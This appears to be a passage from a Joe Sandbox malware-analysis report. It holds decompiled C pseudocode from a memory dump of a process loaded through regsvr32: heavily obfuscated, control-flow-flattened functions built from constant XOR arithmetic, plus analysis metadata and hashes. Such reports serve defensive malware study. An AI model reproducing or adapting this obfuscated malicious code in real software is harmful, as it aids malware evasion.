                                                                                                                				_v340 = _v340 + 0xffff731b;
                                                                                                                				_v340 = _v340 + 0xb41d;
                                                                                                                				_v340 = _v340 ^ 0x004da8cd;
                                                                                                                				_v348 = 0x6a4f76;
                                                                                                                				_v348 = _v348 + 0xdd31;
                                                                                                                				_v348 = _v348 | 0x2de81ddb;
                                                                                                                				_v348 = _v348 >> 7;
                                                                                                                				_v348 = _v348 ^ 0x0052e3c0;
                                                                                                                				_v128 = 0x11561f;
                                                                                                                				_v128 = _v128 + 0xfffff1c2;
                                                                                                                				_v128 = _v128 ^ 0x0011926e;
                                                                                                                				while(1) {
                                                                                                                					L1:
                                                                                                                					_t1025 = 0x6dd4c8c;
                                                                                                                					_t951 = 0x3695613;
                                                                                                                					_t1092 = 0x1eb2293;
                                                                                                                					do {
                                                                                                                						L2:
                                                                                                                						_t1129 = _t1001 - _t1116;
                                                                                                                						if(_t1129 > 0) {
                                                                                                                							__eflags = _t1001 - 0xbffd8ba;
                                                                                                                							if(__eflags == 0) {
                                                                                                                								_t1001 = 0x9b7527f;
                                                                                                                								goto L23;
                                                                                                                							} else {
                                                                                                                								__eflags = _t1001 - _t1112;
                                                                                                                								if(_t1001 == _t1112) {
                                                                                                                									E001B2519(_v340, _v96, _v348, _v216, _v128);
                                                                                                                								} else {
                                                                                                                									__eflags = _t1001 - 0xf4be280;
                                                                                                                									if(__eflags != 0) {
                                                                                                                										goto L23;
                                                                                                                									} else {
                                                                                                                										_t963 =  *0x1c4208; // 0x0
                                                                                                                										E001B17D2(_v224, _v136,  *_t963);
                                                                                                                										_t1001 = _t1112;
                                                                                                                										goto L1;
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							if(_t1129 == 0) {
                                                                                                                								_push(_v312);
                                                                                                                								_push(0x1a15e4);
                                                                                                                								_push(_v380);
                                                                                                                								_t1117 = E001BF5D9(_v304, _v372, __eflags);
                                                                                                                								_v44 = _v176;
                                                                                                                								_v40 = _v168;
                                                                                                                								_v36 = _v296;
                                                                                                                								_t957 =  *0x1c4208; // 0x0
                                                                                                                								_t1027 =  *0x1c4208; // 0x0
                                                                                                                								_t874 = _t1027 + 0x1c; // 0x1c
                                                                                                                								_t959 = E001BA42C(_v356, _v256,  *_t1027, _t874, _v304, _v264, _v272, _v304, _v364,  *((intOrPtr*)(_t957 + 4)), _v280, _v288, _t952,  &_v44, _v96, _v160);
                                                                                                                								_t1125 =  &(_t1123[0x11]);
                                                                                                                								__eflags = _t959 - _v248;
                                                                                                                								if(_t959 != _v248) {
                                                                                                                									_t1001 = 0xf4be280;
                                                                                                                								} else {
                                                                                                                									_t1001 = _t1112;
                                                                                                                									_t1121 = 1;
                                                                                                                								}
                                                                                                                								E001BF94B(_t1117, _v144, _v152, _v232, _v240);
                                                                                                                								_t1123 =  &(_t1125[3]);
                                                                                                                								goto L17;
                                                                                                                							} else {
                                                                                                                								if(_t1001 == _t1092) {
                                                                                                                									_push(_v284);
                                                                                                                									_push(0x1a14e4);
                                                                                                                									_push(_v140);
                                                                                                                									_t965 = E001BF5D9(_v200, _v116, __eflags);
                                                                                                                									_t1034 =  *0x1c4208; // 0x0
                                                                                                                									__eflags = E001AEB4B(_t1034 + 4, _v344, _v276, _v396, _v244, _v192,  &_v92, _v404, _t965, _v96) - _v336;
                                                                                                                									_t1001 =  ==  ? 0x3695613 : _t1112;
                                                                                                                									E001BF94B(_t965, _v184, _v320, _v328, _v388);
                                                                                                                									_t1123 =  &(_t1123[0xf]);
                                                                                                                									goto L17;
                                                                                                                								} else {
                                                                                                                									if(_t1001 == _t951) {
                                                                                                                										_t975 =  *0x1c4208; // 0x0
                                                                                                                										_push(_t1025);
                                                                                                                										_t1038 = E001A303A(_t1025,  *((intOrPtr*)(_t975 + 4)));
                                                                                                                										_t1123 =  &(_t1123[3]);
                                                                                                                										_t977 =  *0x1c4208; // 0x0
                                                                                                                										__eflags = _t1038;
                                                                                                                										_t1001 =  !=  ? _t1116 : _t1112;
                                                                                                                										 *_t977 = _t1038;
                                                                                                                										while(1) {
                                                                                                                											L1:
                                                                                                                											_t1025 = 0x6dd4c8c;
                                                                                                                											_t951 = 0x3695613;
                                                                                                                											_t1092 = 0x1eb2293;
                                                                                                                											goto L2;
                                                                                                                										}
                                                                                                                									} else {
                                                                                                                										if(_t1001 == _t1025) {
                                                                                                                											_push(_v368);
                                                                                                                											_push(0x1a1574);
                                                                                                                											_push(_v424);
                                                                                                                											_t978 = E001BF5D9(_v188, _v384, __eflags);
                                                                                                                											_push(_v260);
                                                                                                                											_t1113 = _t978;
                                                                                                                											_push(0x1a15a4);
                                                                                                                											_push(_v308);
                                                                                                                											_t979 = E001BF5D9(_v480, _v416, __eflags);
                                                                                                                											_v80 = _v476;
                                                                                                                											_t981 = E001B0184(_v300, _v460, _t1113, _v220, _v468);
                                                                                                                											_v72 = _v72 & 0x00000000;
                                                                                                                											_v76 = _t1113;
                                                                                                                											_v68 = 1;
                                                                                                                											_v84 = 2 + _t981 * 2;
                                                                                                                											_v64 =  &_v84;
                                                                                                                											_t984 = 0x20;
                                                                                                                											_v92 = _t984;
                                                                                                                											__eflags = E001A7A69(_v100, _v172, _t979, _v88,  &_v92, _v292,  &_v72,  &_v32, _v124, _v180, _t984, _v252, _v108) - _v164;
                                                                                                                											_t1001 =  ==  ? 0x1eb2293 : 0xf04754f;
                                                                                                                											E001BF94B(_t1113, _v436, _v104, _v444, _v452);
                                                                                                                											E001BF94B(_t979, _v412, _v156, _v420, _v428);
                                                                                                                											_t1123 =  &(_t1123[0x1a]);
                                                                                                                											goto L9;
                                                                                                                										} else {
                                                                                                                											_t1133 = _t1001 - 0x9b7527f;
                                                                                                                											if(_t1001 == 0x9b7527f) {
                                                                                                                												_push(_v212);
                                                                                                                												_push(0x1a15c4);
                                                                                                                												_push(_v208);
                                                                                                                												_t993 = E001BF5D9(_v352, _v332, _t1133);
                                                                                                                												_push(_v472);
                                                                                                                												_push(0x1a1504);
                                                                                                                												_push(_v268);
                                                                                                                												E001AD2C9(_t993, _v324, _v196, _v204,  &_v96, _v456, _v376, E001BF5D9(_v464, _v408, _t1133));
                                                                                                                												_t1001 =  ==  ? 0x6dd4c8c : 0xbb7c7e4;
                                                                                                                												E001BF94B(_t993, _v440, _v236, _v360, _v448);
                                                                                                                												E001BF94B(_t994, _v432, _v132, _v316, _v392);
                                                                                                                												_t1123 =  &(_t1123[0x12]);
                                                                                                                												L9:
                                                                                                                												_t1112 = 0xf04754f;
                                                                                                                												L17:
                                                                                                                												_t1116 = 0xb28fc88;
                                                                                                                												_t951 = 0x3695613;
                                                                                                                												_t1025 = 0x6dd4c8c;
                                                                                                                												_t1092 = 0x1eb2293;
                                                                                                                											}
                                                                                                                										}
                                                                                                                										goto L23;
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						L26:
                                                                                                                						return _t1121;
                                                                                                                						L23:
                                                                                                                					} while (_t1001 != 0xbb7c7e4);
                                                                                                                					goto L26;
                                                                                                                				}
                                                                                                                			}






























































































































































                                                                                                                0x001af109
                                                                                                                0x001af111
                                                                                                                0x001af119
                                                                                                                0x001af121
                                                                                                                0x001af129
                                                                                                                0x001af131
                                                                                                                0x001af139
                                                                                                                0x001af145
                                                                                                                0x001af14a
                                                                                                                0x001af150
                                                                                                                0x001af158
                                                                                                                0x001af15b
                                                                                                                0x001af161
                                                                                                                0x001af169
                                                                                                                0x001af174
                                                                                                                0x001af188
                                                                                                                0x001af18d
                                                                                                                0x001af196
                                                                                                                0x001af1a1
                                                                                                                0x001af1ac
                                                                                                                0x001af1b4
                                                                                                                0x001af1bf
                                                                                                                0x001af1ca
                                                                                                                0x001af1d5
                                                                                                                0x001af1e2
                                                                                                                0x001af1e5
                                                                                                                0x001af1f1
                                                                                                                0x001af1f5
                                                                                                                0x001af1fa
                                                                                                                0x001af202
                                                                                                                0x001af20a
                                                                                                                0x001af20f
                                                                                                                0x001af217
                                                                                                                0x001af21c
                                                                                                                0x001af224
                                                                                                                0x001af22f
                                                                                                                0x001af23a
                                                                                                                0x001af245
                                                                                                                0x001af250
                                                                                                                0x001af25b
                                                                                                                0x001af266
                                                                                                                0x001af271
                                                                                                                0x001af279
                                                                                                                0x001af27e
                                                                                                                0x001af283
                                                                                                                0x001af288
                                                                                                                0x001af290
                                                                                                                0x001af29b
                                                                                                                0x001af2a2
                                                                                                                0x001af2ad
                                                                                                                0x001af2b9
                                                                                                                0x001af2bc
                                                                                                                0x001af2c0
                                                                                                                0x001af2c9
                                                                                                                0x001af2cd
                                                                                                                0x001af2d5
                                                                                                                0x001af2dd
                                                                                                                0x001af2e2
                                                                                                                0x001af2e7
                                                                                                                0x001af2ef
                                                                                                                0x001af2f7
                                                                                                                0x001af302
                                                                                                                0x001af30a
                                                                                                                0x001af312
                                                                                                                0x001af31a
                                                                                                                0x001af325
                                                                                                                0x001af32d
                                                                                                                0x001af335
                                                                                                                0x001af33d
                                                                                                                0x001af345
                                                                                                                0x001af34d
                                                                                                                0x001af355
                                                                                                                0x001af35d
                                                                                                                0x001af367
                                                                                                                0x001af36b
                                                                                                                0x001af373
                                                                                                                0x001af386
                                                                                                                0x001af38f
                                                                                                                0x001af39a
                                                                                                                0x001af3a5
                                                                                                                0x001af3ba
                                                                                                                0x001af3bd
                                                                                                                0x001af3cf
                                                                                                                0x001af3d6
                                                                                                                0x001af3e1
                                                                                                                0x001af3ec
                                                                                                                0x001af3f4
                                                                                                                0x001af3ff
                                                                                                                0x001af40a
                                                                                                                0x001af412
                                                                                                                0x001af41a
                                                                                                                0x001af422
                                                                                                                0x001af42a
                                                                                                                0x001af432
                                                                                                                0x001af43d
                                                                                                                0x001af44f
                                                                                                                0x001af454
                                                                                                                0x001af45d
                                                                                                                0x001af468
                                                                                                                0x001af470
                                                                                                                0x001af475
                                                                                                                0x001af47d
                                                                                                                0x001af482
                                                                                                                0x001af48a
                                                                                                                0x001af495
                                                                                                                0x001af49d
                                                                                                                0x001af4a8
                                                                                                                0x001af4ba
                                                                                                                0x001af4bf
                                                                                                                0x001af4c8
                                                                                                                0x001af4d3
                                                                                                                0x001af4de
                                                                                                                0x001af4e9
                                                                                                                0x001af4f4
                                                                                                                0x001af4ff
                                                                                                                0x001af50a
                                                                                                                0x001af512
                                                                                                                0x001af51d
                                                                                                                0x001af530
                                                                                                                0x001af531
                                                                                                                0x001af538
                                                                                                                0x001af543
                                                                                                                0x001af54e
                                                                                                                0x001af562
                                                                                                                0x001af569
                                                                                                                0x001af574
                                                                                                                0x001af57c
                                                                                                                0x001af584
                                                                                                                0x001af58c
                                                                                                                0x001af594
                                                                                                                0x001af59c
                                                                                                                0x001af5a7
                                                                                                                0x001af5af
                                                                                                                0x001af5ba
                                                                                                                0x001af5c2
                                                                                                                0x001af5cf
                                                                                                                0x001af5d3
                                                                                                                0x001af5d7
                                                                                                                0x001af5df
                                                                                                                0x001af5e9
                                                                                                                0x001af5ee
                                                                                                                0x001af5f6
                                                                                                                0x001af5fb
                                                                                                                0x001af603
                                                                                                                0x001af60b
                                                                                                                0x001af610
                                                                                                                0x001af61b
                                                                                                                0x001af620
                                                                                                                0x001af624
                                                                                                                0x001af62c
                                                                                                                0x001af641
                                                                                                                0x001af642
                                                                                                                0x001af649
                                                                                                                0x001af654
                                                                                                                0x001af65c
                                                                                                                0x001af664
                                                                                                                0x001af66c
                                                                                                                0x001af671
                                                                                                                0x001af679
                                                                                                                0x001af689
                                                                                                                0x001af68d
                                                                                                                0x001af695
                                                                                                                0x001af69d
                                                                                                                0x001af6a5
                                                                                                                0x001af6b8
                                                                                                                0x001af6bf
                                                                                                                0x001af6ca
                                                                                                                0x001af6d5
                                                                                                                0x001af6e0
                                                                                                                0x001af6eb
                                                                                                                0x001af6f6
                                                                                                                0x001af701
                                                                                                                0x001af70c
                                                                                                                0x001af720
                                                                                                                0x001af727
                                                                                                                0x001af732
                                                                                                                0x001af73d
                                                                                                                0x001af748
                                                                                                                0x001af753
                                                                                                                0x001af75e
                                                                                                                0x001af769
                                                                                                                0x001af774
                                                                                                                0x001af787
                                                                                                                0x001af78e
                                                                                                                0x001af799
                                                                                                                0x001af7a1
                                                                                                                0x001af7a9
                                                                                                                0x001af7b1
                                                                                                                0x001af7bc
                                                                                                                0x001af7c4
                                                                                                                0x001af7cf
                                                                                                                0x001af7da
                                                                                                                0x001af7ed
                                                                                                                0x001af7f4
                                                                                                                0x001af7ff
                                                                                                                0x001af80a
                                                                                                                0x001af812
                                                                                                                0x001af81d
                                                                                                                0x001af828
                                                                                                                0x001af83b
                                                                                                                0x001af842
                                                                                                                0x001af84d
                                                                                                                0x001af858
                                                                                                                0x001af863
                                                                                                                0x001af870
                                                                                                                0x001af878
                                                                                                                0x001af884
                                                                                                                0x001af887
                                                                                                                0x001af890
                                                                                                                0x001af894
                                                                                                                0x001af89c
                                                                                                                0x001af8a7
                                                                                                                0x001af8b2
                                                                                                                0x001af8bd
                                                                                                                0x001af8c8
                                                                                                                0x001af8d3
                                                                                                                0x001af8de
                                                                                                                0x001af8f1
                                                                                                                0x001af8f8
                                                                                                                0x001af903
                                                                                                                0x001af90e
                                                                                                                0x001af919
                                                                                                                0x001af921
                                                                                                                0x001af92c
                                                                                                                0x001af942
                                                                                                                0x001af949
                                                                                                                0x001af951

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: }$$:$&F$)0$.$1L$8Z}$;Da$AE$FJ$]|$d.$n6$vOj$}$J$<s$J$}Q
                                                                                                                • API String ID: 0-2034874769
                                                                                                                • Opcode ID: fdb5ce1ecaec1105bfddf626768ba0c09d829232556f9b27d6bb6649fdadcd0f
                                                                                                                • Instruction ID: a97a9bdf50e78dbd4e6c2056853f21510f8fae84ab4d08543572258ed5705d3c
                                                                                                                • Opcode Fuzzy Hash: fdb5ce1ecaec1105bfddf626768ba0c09d829232556f9b27d6bb6649fdadcd0f
                                                                                                                • Instruction Fuzzy Hash: 58A2FE715093809FD3B9CF65C58ABCBBBE1BBC5708F10891DE1DA96260DBB18949CF42
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 81%
                                                                                                                			E001BBD63(signed int __ecx, intOrPtr __edx, intOrPtr _a4, signed int* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, signed int _a36, intOrPtr _a40) {
                                                                                                                				intOrPtr _v4;
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				signed int _v36;
                                                                                                                				signed int _v40;
                                                                                                                				signed int _v44;
                                                                                                                				signed int _v48;
                                                                                                                				signed int _v52;
                                                                                                                				signed int _v56;
                                                                                                                				signed int _v60;
                                                                                                                				signed int _v64;
                                                                                                                				signed int _v68;
                                                                                                                				signed int _v72;
                                                                                                                				signed int _v76;
                                                                                                                				signed int _v80;
                                                                                                                				signed int _v84;
                                                                                                                				signed int _v88;
                                                                                                                				signed int _v92;
                                                                                                                				signed int _v96;
                                                                                                                				signed int _v100;
                                                                                                                				signed int _v104;
                                                                                                                				signed int _v108;
                                                                                                                				signed int _v112;
                                                                                                                				signed int _v116;
                                                                                                                				signed int _v120;
                                                                                                                				signed int _v124;
                                                                                                                				signed int _v128;
                                                                                                                				signed int _v132;
                                                                                                                				signed int _v136;
                                                                                                                				signed int _v140;
                                                                                                                				signed int _v144;
                                                                                                                				signed int _v148;
                                                                                                                				signed int _v152;
                                                                                                                				signed int _v156;
                                                                                                                				signed int _v160;
                                                                                                                				signed int _v164;
                                                                                                                				signed int _v168;
                                                                                                                				signed int _v172;
                                                                                                                				signed int _v176;
                                                                                                                				signed int _v180;
                                                                                                                				signed int _v184;
                                                                                                                				signed int _v188;
                                                                                                                				signed int _v192;
                                                                                                                				signed int _v196;
                                                                                                                				signed int _v200;
                                                                                                                				signed int _v204;
                                                                                                                				signed int _v208;
                                                                                                                				signed int _v212;
                                                                                                                				signed int _v216;
                                                                                                                				signed int _v220;
                                                                                                                				signed int _v224;
                                                                                                                				signed int _v228;
                                                                                                                				signed int _v232;
                                                                                                                				signed int _v236;
                                                                                                                				signed int _v240;
                                                                                                                				signed int _v244;
                                                                                                                				signed int _v248;
                                                                                                                				signed int _v252;
                                                                                                                				signed int _v256;
                                                                                                                				signed int _v260;
                                                                                                                				signed int _v264;
                                                                                                                				signed int _v268;
                                                                                                                				signed int _v272;
                                                                                                                				signed int _v276;
                                                                                                                				signed int _v280;
                                                                                                                				signed int _v284;
                                                                                                                				signed int _v288;
                                                                                                                				signed int _v292;
                                                                                                                				signed int _v296;
                                                                                                                				signed int _v300;
                                                                                                                				signed int _v304;
                                                                                                                				signed int _v308;
                                                                                                                				signed int _v312;
                                                                                                                				signed int _t830;
                                                                                                                				intOrPtr _t831;
                                                                                                                				void* _t845;
                                                                                                                				signed int _t853;
                                                                                                                				signed int _t859;
                                                                                                                				signed int* _t861;
                                                                                                                				signed int _t870;
                                                                                                                				signed int _t880;
                                                                                                                				void* _t920;
                                                                                                                				signed int _t938;
                                                                                                                				signed int _t939;
                                                                                                                				signed int _t940;
                                                                                                                				signed int _t941;
                                                                                                                				signed int _t942;
                                                                                                                				signed int _t943;
                                                                                                                				signed int _t944;
                                                                                                                				signed int _t945;
                                                                                                                				signed int _t946;
                                                                                                                				signed int _t947;
                                                                                                                				signed int _t948;
                                                                                                                				signed int _t949;
                                                                                                                				signed int _t950;
                                                                                                                				signed int _t951;
                                                                                                                				signed int _t952;
                                                                                                                				signed int _t954;
                                                                                                                				signed int _t959;
                                                                                                                				signed int _t960;
                                                                                                                				signed int* _t962;
                                                                                                                				void* _t966;
                                                                                                                
                                                                                                                				_push(_a40);
                                                                                                                				_v4 = __edx;
                                                                                                                				_push(_a36);
                                                                                                                				_t861 = _a8;
                                                                                                                				_push(_a32);
                                                                                                                				_v8 = __ecx;
                                                                                                                				_push(_a28);
                                                                                                                				_push(_a24);
                                                                                                                				_push(_a20);
                                                                                                                				_push(_a16);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_t861);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx & 0x0000ffff);
                                                                                                                				E001AC98A(__ecx & 0x0000ffff);
                                                                                                                				_v308 = 0x1e9619;
                                                                                                                				_t962 =  &(( &_v312)[0xc]);
                                                                                                                				_v308 = _v308 ^ 0xdd4ab515;
                                                                                                                				_v308 = _v308 | 0x6679f5c5;
                                                                                                                				_v308 = _v308 ^ 0xff7df7cd;
                                                                                                                				_t859 = 0;
                                                                                                                				_v184 = 0x607c46;
                                                                                                                				_t952 = 0x9cb49f1;
                                                                                                                				_v16 = 0;
                                                                                                                				_t22 =  &_v184; // 0x607c46
                                                                                                                				_t938 = 0x55;
                                                                                                                				_v184 =  *_t22 / _t938;
                                                                                                                				_v184 = _v184 ^ 0xcc954262;
                                                                                                                				_v184 = _v184 ^ 0xcc9460e6;
                                                                                                                				_v56 = 0xc8af3a;
                                                                                                                				_v56 = _v56 + 0xc41a;
                                                                                                                				_v56 = _v56 ^ 0x00c9739c;
                                                                                                                				_v300 = 0x95183c;
                                                                                                                				_v300 = _v300 | 0xeef1245e;
                                                                                                                				_v300 = _v300 + 0xffffe7c3;
                                                                                                                				_v300 = _v300 >> 1;
                                                                                                                				_v300 = _v300 ^ 0x777a1220;
                                                                                                                				_v24 = 0xedb83a;
                                                                                                                				_v24 = _v24 ^ 0xb8133b49;
                                                                                                                				_v24 = _v24 ^ 0xb8fec373;
                                                                                                                				_v252 = 0x16b936;
                                                                                                                				_v252 = _v252 ^ 0x1d43f4de;
                                                                                                                				_v252 = _v252 >> 2;
                                                                                                                				_v252 = _v252 + 0xfffffb4f;
                                                                                                                				_v252 = _v252 ^ 0x07154ec9;
                                                                                                                				_v48 = 0x4e7b66;
                                                                                                                				_v48 = _v48 >> 9;
                                                                                                                				_v48 = _v48 ^ 0x0004273d;
                                                                                                                				_v228 = 0xea44e6;
                                                                                                                				_t66 =  &_v228; // 0xea44e6
                                                                                                                				_t959 = 0x6a;
                                                                                                                				_v228 =  *_t66 / _t959;
                                                                                                                				_v228 = _v228 ^ 0x544f9d8e;
                                                                                                                				_v228 = _v228 ^ 0x504da846;
                                                                                                                				_v276 = 0x8f2397;
                                                                                                                				_v276 = _v276 >> 0xb;
                                                                                                                				_t939 = 0x1d;
                                                                                                                				_v276 = _v276 / _t939;
                                                                                                                				_v276 = _v276 + 0xb67d;
                                                                                                                				_v276 = _v276 ^ 0x0008b71a;
                                                                                                                				_v160 = 0x4aeaec;
                                                                                                                				_v160 = _v160 << 0xb;
                                                                                                                				_v160 = _v160 / _t959;
                                                                                                                				_v160 = _v160 ^ 0x00d2f200;
                                                                                                                				_v128 = 0xeb6345;
                                                                                                                				_v128 = _v128 ^ 0x79260654;
                                                                                                                				_v128 = _v128 | 0xd1f17a14;
                                                                                                                				_v128 = _v128 ^ 0xf9fd7e15;
                                                                                                                				_v168 = 0xa1c1a1;
                                                                                                                				_t940 = 0x3c;
                                                                                                                				_v168 = _v168 / _t940;
                                                                                                                				_v168 = _v168 / _t959;
                                                                                                                				_v168 = _v168 ^ 0x80000682;
                                                                                                                				_v72 = 0xc65e02;
                                                                                                                				_v72 = _v72 ^ 0xaea6cfa9;
                                                                                                                				_v72 = _v72 ^ 0xae6091ab;
                                                                                                                				_v172 = 0x2dba9f;
                                                                                                                				_v172 = _v172 + 0x1864;
                                                                                                                				_v172 = _v172 << 0xe;
                                                                                                                				_v172 = _v172 ^ 0x74c0c041;
                                                                                                                				_v280 = 0x17b6ce;
                                                                                                                				_v280 = _v280 | 0xeeb992a2;
                                                                                                                				_t941 = 0x53;
                                                                                                                				_v280 = _v280 / _t941;
                                                                                                                				_v280 = _v280 >> 0x10;
                                                                                                                				_v280 = _v280 ^ 0x000002ff;
                                                                                                                				_v44 = 0x1f5d8e;
                                                                                                                				_t942 = 0x3e;
                                                                                                                				_v44 = _v44 * 0x37;
                                                                                                                				_v44 = _v44 ^ 0x06bd199d;
                                                                                                                				_v292 = 0x436554;
                                                                                                                				_v292 = _v292 + 0xffff7881;
                                                                                                                				_v292 = _v292 + 0xffff96c3;
                                                                                                                				_v292 = _v292 << 0xa;
                                                                                                                				_v292 = _v292 ^ 0x09d26003;
                                                                                                                				_v272 = 0x168c92;
                                                                                                                				_v272 = _v272 ^ 0x4fab9044;
                                                                                                                				_v272 = _v272 + 0xffff3bd6;
                                                                                                                				_v272 = _v272 ^ 0x94a5e241;
                                                                                                                				_v272 = _v272 ^ 0xdb19bbed;
                                                                                                                				_v304 = 0x854015;
                                                                                                                				_v304 = _v304 << 0xd;
                                                                                                                				_v304 = _v304 ^ 0xa80be028;
                                                                                                                				_v308 = 0x18ebc8;
                                                                                                                				_v308 = _v308 + 0x9245;
                                                                                                                				_v308 = _v308 + 0xfea1;
                                                                                                                				_v308 = _v308 ^ 0x001a3655;
                                                                                                                				_v308 = 0x4c7939;
                                                                                                                				_v308 = _v308 << 6;
                                                                                                                				_v308 = _v308 | 0xd3d2cc8e;
                                                                                                                				_v308 = _v308 ^ 0xd3d1cd34;
                                                                                                                				_v304 = 0xe27dd7;
                                                                                                                				_v304 = _v304 | 0xf3ccb3e7;
                                                                                                                				_v304 = _v304 ^ 0xf3e71592;
                                                                                                                				_v312 = 0x7b0c50;
                                                                                                                				_v312 = _v312 / _t942;
                                                                                                                				_v312 = _v312 * 0xe;
                                                                                                                				_v312 = _v312 ^ 0x0f8f7a29;
                                                                                                                				_v312 = _v312 ^ 0x0f94b085;
                                                                                                                				_v304 = 0x43ae4b;
                                                                                                                				_v304 = _v304 + 0xffffad53;
                                                                                                                				_v304 = _v304 ^ 0x0042b126;
                                                                                                                				_v308 = 0x184cdd;
                                                                                                                				_v308 = _v308 >> 8;
                                                                                                                				_v308 = _v308 >> 0xe;
                                                                                                                				_v308 = _v308 ^ 0x000c1965;
                                                                                                                				_v312 = 0x9f4334;
                                                                                                                				_v312 = _v312 + 0xffff91d4;
                                                                                                                				_v312 = _v312 + 0xffff8200;
                                                                                                                				_v312 = _v312 >> 2;
                                                                                                                				_v312 = _v312 ^ 0x002131c8;
                                                                                                                				_v308 = 0xec2dcd;
                                                                                                                				_v308 = _v308 + 0xffff28bd;
                                                                                                                				_v308 = _v308 + 0xffffa5f1;
                                                                                                                				_v308 = _v308 ^ 0x00e869a8;
                                                                                                                				_v312 = 0x2a368e;
                                                                                                                				_v312 = _v312 ^ 0x76c3ccc6;
                                                                                                                				_v312 = _v312 + 0xffff8ec2;
                                                                                                                				_v312 = _v312 >> 0xe;
                                                                                                                				_v312 = _v312 ^ 0x000ab56d;
                                                                                                                				_v304 = 0x947af2;
                                                                                                                				_v304 = _v304 | 0xa150a96c;
                                                                                                                				_v304 = _v304 ^ 0xa1dc7ba6;
                                                                                                                				_v312 = 0xb5bb09;
                                                                                                                				_t943 = 0x13;
                                                                                                                				_v312 = _v312 / _t943;
                                                                                                                				_v312 = _v312 >> 5;
                                                                                                                				_v312 = _v312 >> 0xd;
                                                                                                                				_v312 = _v312 ^ 0x000700e1;
                                                                                                                				_v304 = 0xbfe6c;
                                                                                                                				_v304 = _v304 >> 0xb;
                                                                                                                				_v304 = _v304 ^ 0x00036496;
                                                                                                                				_v268 = 0x5a9706;
                                                                                                                				_v268 = _v268 | 0x07732f5b;
                                                                                                                				_t944 = 0x14;
                                                                                                                				_v268 = _v268 * 3;
                                                                                                                				_v268 = _v268 + 0xffffa7b9;
                                                                                                                				_v268 = _v268 ^ 0x1675259e;
                                                                                                                				_v208 = 0xd37bb6;
                                                                                                                				_v208 = _v208 + 0xffff380a;
                                                                                                                				_v208 = _v208 + 0xfffffbd9;
                                                                                                                				_v208 = _v208 ^ 0x00d4cda9;
                                                                                                                				_v40 = 0x2bdf01;
                                                                                                                				_v40 = _v40 + 0xffff3a64;
                                                                                                                				_v40 = _v40 ^ 0x0021cc48;
                                                                                                                				_v80 = 0xe6d7bf;
                                                                                                                				_v80 = _v80 + 0x2335;
                                                                                                                				_v80 = _v80 ^ 0x00eff494;
                                                                                                                				_v132 = 0x6017f7;
                                                                                                                				_v132 = _v132 / _t944;
                                                                                                                				_v132 = _v132 ^ 0x83e26fc3;
                                                                                                                				_v132 = _v132 ^ 0x83e399cf;
                                                                                                                				_v200 = 0x129c2;
                                                                                                                				_v200 = _v200 ^ 0xb049febe;
                                                                                                                				_v200 = _v200 * 0x6d;
                                                                                                                				_v200 = _v200 ^ 0x0f0d8a63;
                                                                                                                				_v124 = 0x72ccb;
                                                                                                                				_v124 = _v124 << 2;
                                                                                                                				_v124 = _v124 >> 0xb;
                                                                                                                				_v124 = _v124 ^ 0x0005211e;
                                                                                                                				_v244 = 0x48de31;
                                                                                                                				_v244 = _v244 + 0x1128;
                                                                                                                				_v244 = _v244 * 0x1d;
                                                                                                                				_v244 = _v244 + 0xffffc180;
                                                                                                                				_v244 = _v244 ^ 0x08410249;
                                                                                                                				_v32 = 0xec3001;
                                                                                                                				_v32 = _v32 << 9;
                                                                                                                				_v32 = _v32 ^ 0xd8688717;
                                                                                                                				_v284 = 0x302c5d;
                                                                                                                				_t333 =  &_v284; // 0x302c5d
                                                                                                                				_v284 =  *_t333 * 0x34;
                                                                                                                				_v284 = _v284 | 0xcc4c575a;
                                                                                                                				_v284 = _v284 + 0x6558;
                                                                                                                				_v284 = _v284 ^ 0xcdccc7f6;
                                                                                                                				_v260 = 0xa2f7e6;
                                                                                                                				_v260 = _v260 << 0xb;
                                                                                                                				_v260 = _v260 + 0xffffb8ad;
                                                                                                                				_t945 = 0x6b;
                                                                                                                				_v260 = _v260 * 0x3a;
                                                                                                                				_v260 = _v260 ^ 0x6146439e;
                                                                                                                				_v64 = 0x960d03;
                                                                                                                				_v64 = _v64 + 0xffffb6c5;
                                                                                                                				_v64 = _v64 ^ 0x009b168c;
                                                                                                                				_v108 = 0xea769d;
                                                                                                                				_v108 = _v108 | 0x69751ae5;
                                                                                                                				_v108 = _v108 >> 0xd;
                                                                                                                				_v108 = _v108 ^ 0x000a40a7;
                                                                                                                				_v192 = 0x35da0c;
                                                                                                                				_v192 = _v192 << 0xa;
                                                                                                                				_v192 = _v192 + 0xffff2d3b;
                                                                                                                				_v192 = _v192 ^ 0xd76be16a;
                                                                                                                				_v112 = 0x63db36;
                                                                                                                				_v112 = _v112 * 0x6c;
                                                                                                                				_v112 = _v112 >> 4;
                                                                                                                				_v112 = _v112 ^ 0x02a611ef;
                                                                                                                				_v92 = 0x702225;
                                                                                                                				_v92 = _v92 | 0xf3fb686f;
                                                                                                                				_v92 = _v92 / _t945;
                                                                                                                				_v92 = _v92 ^ 0x024f3dea;
                                                                                                                				_v100 = 0x69768;
                                                                                                                				_v100 = _v100 >> 6;
                                                                                                                				_v100 = _v100 + 0xca65;
                                                                                                                				_v100 = _v100 ^ 0x000cba6f;
                                                                                                                				_v20 = 0xcedca6;
